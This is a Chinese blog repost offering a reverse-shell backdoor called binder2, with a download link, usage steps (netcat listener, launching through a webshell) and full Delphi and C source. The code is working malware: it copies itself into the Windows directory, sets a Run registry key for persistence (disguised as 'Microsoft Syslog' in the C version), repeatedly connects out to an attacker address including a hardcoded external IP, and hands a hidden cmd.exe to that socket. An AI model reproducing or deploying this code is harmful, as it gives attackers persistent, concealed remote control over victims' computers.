现在的位置: 首页 > 综合 > 正文

Delphi 版 binder2 反弹式后门程序及工具

2013年05月30日 ⁄ 综合 ⁄ 共 4499字 ⁄ 字号 评论关闭

Delphi 版 binder2 反弹式后门程序及工具

下载地址:http://downloads.2ccc.com/general/internet_lan/bander2.rar


Winsock2为kol socket单元文件,修改自c版代码binder2.c

使用说明:

binder2.exe 反弹式后门程序

简介:

在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用.

用法:

1. 在本地机器监听一个端口:

netcat -vv -l -p 80

2. 通过webShell或是别的什么运行后门:

kol_binder2 80 youIPadd

3. 本地监听端口将截获一个来自远程主机的cmd.

注意:

程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址127.0.0.1,端口1234.
程序会复制自身到c:/winnt/下名为binder2.exe,并在
HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//Run 下创建启动键. 如果需要卸载,请使用 kol_binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.)

Code by hnxyy
Date:2005/6/16
QQ:19026695

program kol_binder2;

uses
Windows,Winsock2,winsock;

function StrToIntDef(const S: string; Default: Integer): Integer;
var
E: Integer;
begin
Val(S, Result, E);
if E <> 0 then Result := Default;
end;

var
mykey :HKEY;
buffer,cmd :array[0..MAX_PATH] of char;
si :TStartupInfo;
wd :TWSAdata;
sock :TSocket;
pi :TProcessInformation;
sin :TSockAddrIn;
ip :pchar;
port :integer;
begin
GetWindowsDirectory(buffer,MAX_PATH);
lstrcat(buffer,'/binder2.exe');
GetModuleFileName(hInstance,cmd,MAX_PATH);
CopyFile(cmd,buffer,false);
RegOpenKeyEx(HKEY_CURRENT_USER,'Software/Microsoft/Windows/CurrentVersion/Run',0,KEY_ALL_ACCESS,mykey);
RegSetValueEx(mykey,'binder2',0,REG_SZ,@buffer,sizeof(buffer));

if (ParamCount=1) and (lstrcmpi(lpstr(ParamStr(1)),'/kill')=0) then
begin
RegDeleteValue(MyKey,'binder2');
DeleteFile(buffer);
ExitProcess(0);
end;

if (ParamCount<1) or (ParamCount>2) then
begin
port :=1234;
ip :='127.0.0.1';
end else
begin
port :=StrToIntDef(ParamStr(1),0);
ip :=lpstr(ParamStr(2));
end;

//FillChar(si,sizeof(si),#0);
//WSAStartup($101,wd);
//sock :=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP);
ZeroMemory(@si, SizeOf(si));
WSAStartup(MAKEWORD(1,1),wd);
sock :=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, nil, 0, 0);
sin.sin_family :=AF_INET;
  sin.sin_port :=htons(port);
  sin.sin_addr.s_addr :=inet_addr(ip);
while (connect(sock,sin,sizeof(sin))<>0) do Sleep(30000);

si.cb :=sizeof(si);
  si.dwFlags :=STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES;
  si.wShowWindow :=SW_HIDE;
si.hStdInput :=sock;
si.hStdOutput :=sock;
si.hStdError :=sock;

CreateProcess(nil,'cmd.exe',nil,nil,TRUE,CREATE_NEW_CONSOLE,nil,nil,si,pi);
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
CloseSocket(sock);
WSACleanup;
end.

附 binder2.exe c 版代码

/*
* Trivial Reverse cmd binder
*
* When LAN is full, ThreaT will walk on your network
*
******************************

compile : cl.exe binder2.c

Usage
_____

binder2.exe (backdoor the current workstation & connect to default IP for bind a cmd shell on default Port)
binder2.exe 123 (connect to default IP & bind a cmd shell on port 123)
binder2.exe 123 10.0.0.1 (connect to 10.0.0.1 & bind a cmd shell on port 123)
binder2 /kill (remove startkey of the registery)

******************************
*
* ThreaT@Ifrance.com
* http://s0h.cc/~threat/
*
*/

#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "user32.lib")

/* Win entry point (sa evite d'avoir une grosse console crade qui s'affiche ) */

int WINAPI WinMain(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,    
LPSTR lpszCmdLine,
int nCmdShow
)
{

  WSADATA wd;
  HKEY MyKey;
  SOCKET sock;
  STARTUPINFO si;
  PROCESS_INFORMATION pi;
  struct sockaddr_in sin;
  char buffer[MAX_PATH], cmd[MAX_PATH], *p,
     
  IP[16] = "81.91.66.30/x00";   // adresse IP par default (ici www.s0h.cc)
  unsigned short port = 1234;   // port par default

  /* backdoor le bordel */
  GetWindowsDirectory (buffer,MAX_PATH);
  lstrcat (buffer,"//syslog.exe/x00");
  GetModuleFileName (NULL,cmd,MAX_PATH);

  CopyFile (cmd,buffer,FALSE);
  RegOpenKeyEx(HKEY_CURRENT_USER,"Software//Microsoft//Windows//CurrentVersion//Run",(DWORD)NULL,KEY_ALL_ACCESS,&MyKey);
  RegSetValueEx (MyKey,"Microsoft Syslog",(DWORD)NULL,REG_SZ,( CONST BYTE * )&buffer,strlen (buffer));

  /* traite les eventuels arguments */
  p = strtok (lpszCmdLine," ");    
  if (lpszCmdLine[0] == '/' || IsCharAlphaNumeric(lpszCmdLine[0]))
  {
      if (!lstrcmpi (lpszCmdLine,"/kill")) { RegDeleteValue(MyKey,"Microsoft Syslog"); ExitProcess (0);}
      else port = atoi (lpszCmdLine);

      if ( p = strtok (NULL," ") ) lstrcpyn (IP,p,16);
  }

  /* prepare la sauce */
  memset(&si, 0, sizeof(si));
  WSAStartup(MAKEWORD( 1, 1 ), &wd);

  // David Litchfield in his Blackhat talk said... (PJ)
  sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
 
  sin.sin_family = AF_INET;
  sin.sin_port = htons(port);
  sin.sin_addr.s_addr = inet_addr(IP);

  /* tente une connexion toute les 30 secondes */
  while ( connect(sock, (struct sockaddr*)&sin, sizeof (sin)) ) Sleep (30000);
 
  /* balance le shell et ce casse */
  si.cb = sizeof(si);
  si.dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES;
  si.wShowWindow=SW_HIDE;
  si.hStdInput = si.hStdOutput = si.hStdError = (void *)sock;
  CreateProcess(NULL,"cmd.exe",NULL,NULL, TRUE, 0,0, NULL, &si, &pi );
  return 0;
}

返回
【上篇】
【下篇】

作者:

抱歉!评论已关闭.

返回首页

Copyright © 2013-2018 学步园  保留所有权利.
软文销售 QQ客服:2265327166 点击这里给我发消息(其他合作也可洽谈)
必威体育
必威电竞